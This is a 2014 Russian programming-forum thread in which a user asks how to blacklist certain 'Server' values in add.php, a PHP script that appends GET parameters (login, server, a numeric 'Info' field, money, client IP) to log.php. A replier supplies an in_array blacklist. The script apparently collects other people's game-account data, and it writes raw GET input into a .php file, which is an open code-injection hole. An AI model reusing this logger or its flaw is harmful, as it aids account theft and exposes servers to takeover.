Форум программистов, компьютерный форум, киберфорум
PHP
Войти
Регистрация
Восстановить пароль
 
Рейтинг 4.67/6: Рейтинг темы: голосов - 6, средняя оценка - 4.67
0 / 0 / 0
Регистрация: 20.11.2013
Сообщений: 24
1

Если переменная из GET содержит определённое значение - не обрабатывать запрос.

14.02.2014, 16:02. Просмотров 1242. Ответов 3
Метки нет (Все метки)

Добрый день(ночь), возникла такая проблема. Нужно чтобы определённые запросы поступающие в add.php фильтровались. Код add.php:
Код ADD.PHP
PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php 
$s = date("H:i:s-m.d.y ") . "Login: " . $_GET['log'] . " Server: " . $_GET['srvr'] . " Info: " . $_GET['inf']. " IP: " . $_SERVER['REMOTE_ADDR']; 
if($_GET['h']) 
{ 
    $s = $s . " Money: " . $_GET['mn']; 
} 
$s = $s . "<br />"; 
 
if(strlen($_GET['inf'])>2) 
{ 
$f = fopen("log.php", "a"); 
fwrite($f, $s); 
fclose($f); 
} 
?>
Например, если в "Server" содержится определённое значение, то этот запрос не будет добавляться в базу. Пример того, что добавляется сейчас в базу:
03:28:35-02.14.14 Login: Pixta_Lacoste Server: 91.210.107.87:8460 Info: 56679959 IP: 92.255.222.82 Money: 0

Можно ли сделать так, чтобы добавить этот сервер в "Чёрный список", чтобы он не добавлялся в базу? Надеюсь нормально обьяснил. Помогите.
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
14.02.2014, 16:02
Ответы с готовыми решениями:

Скопировать строку на новый лист, если ячейка содержит определенное значение
Добрый день, нужен макрос, или как по другому решить: Нужно скопировать строку на другой лист,...

Какое значение примет переменная после выполнения фрагмента алгоритма, если переменная а имела значение 'ИНФОРМАТИКА'
Имеется фрагмент алгоритма, записанный на алгоритмическом языке: m := 10 b := Извлечь(а, m) нц...

Условие если переменная содержит определенный текст
Всем привет, помогите пожалуйста нужно написать простенький скрипт. Есть переменная Если внутри...

Скопировать строку на новый лист, если ячейка содержит определенное СЛОВО в тексте - VBA
Имеется код который копирует строки с определенным значением ячейки. Sub perenos() Dim i&amp;...

3
1932 / 1761 / 822
Регистрация: 23.01.2014
Сообщений: 6,205
14.02.2014, 16:23 2
Лучший ответ Сообщение было отмечено Coroo как решение

Решение

Цитата Сообщение от Coroo Посмотреть сообщение
03:28:35-02.14.14 Login: Pixta_Lacoste Server: 91.210.107.87:8460 Info: 56679959 IP: 92.255.222.82 Money: 0
Можно ли сделать так, чтобы добавить этот сервер в "Чёрный список", чтобы он не добавлялся в базу?
А в чем проблема?
PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php 
if ($_GET['srvr']=="91.210.107.87:8460") exit("Сервер находится в черном списке.");
$s = date("H:i:s-m.d.y ") . "Login: " . $_GET['log'] . " Server: " . $_GET['srvr'] . " Info: " . $_GET['inf']. " IP: " . $_SERVER['REMOTE_ADDR']; 
if($_GET['h']) 
{ 
    $s = $s . " Money: " . $_GET['mn']; 
} 
$s = $s . "<br />"; 
 
if(strlen($_GET['inf'])>2) 
{ 
$f = fopen("log.php", "a"); 
fwrite($f, $s); 
fclose($f); 
} 
?>
1
0 / 0 / 0
Регистрация: 20.11.2013
Сообщений: 24
14.02.2014, 16:27  [ТС] 3
Цитата Сообщение от pav1uxa Посмотреть сообщение
А в чем проблема?
PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php 
if ($_GET['srvr']=="91.210.107.87:8460") exit("Сервер находится в черном списке.");
$s = date("H:i:s-m.d.y ") . "Login: " . $_GET['log'] . " Server: " . $_GET['srvr'] . " Info: " . $_GET['inf']. " IP: " . $_SERVER['REMOTE_ADDR']; 
if($_GET['h']) 
{ 
    $s = $s . " Money: " . $_GET['mn']; 
} 
$s = $s . "<br />"; 
 
if(strlen($_GET['inf'])>2) 
{ 
$f = fopen("log.php", "a"); 
fwrite($f, $s); 
fclose($f); 
} 
?>
А как несколько туда добавить? Я просто мало разбираюсь.
0
1932 / 1761 / 822
Регистрация: 23.01.2014
Сообщений: 6,205
14.02.2014, 18:20 4
Лучший ответ Сообщение было отмечено Coroo как решение

Решение

Цитата Сообщение от Coroo Посмотреть сообщение
А как несколько туда добавить? Я просто мало разбираюсь.
PHP
1
2
3
4
5
$a[]="91.210.107.87:8460";
$a[]="123.211.107.87:123";
$a[]="456.212.107.87:8260";
// и так далее
if (in_array($_GET['srvr'], $a)) exit("Сервер находится в черном списке.");
1
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
14.02.2014, 18:20

Заказываю контрольные, курсовые, дипломные и любые другие студенческие работы здесь.

Проверить содержит ли переменная значение
есть код: &lt;div class=&quot;panel_2&quot;&gt; &lt;?php /* =здесь определяем текущего...

Какое значение содержит переменная р?
type ptr=^integer; var p:ptr; begin new(p) Добавлено через 1 минуту 1. значение типа...

Какое значение содержит сам указатель, как переменная?
Здравствуйте, я новичок. Не могу понять никак один момент в указателях. Если *number - это значение...

Если переменная x после цикла получает значение 3 и если ее вывести заданным образом
Если переменная x после цикла получает значение 3 и если ее вывести следующим образом:...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
4
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2020, vBulletin Solutions, Inc.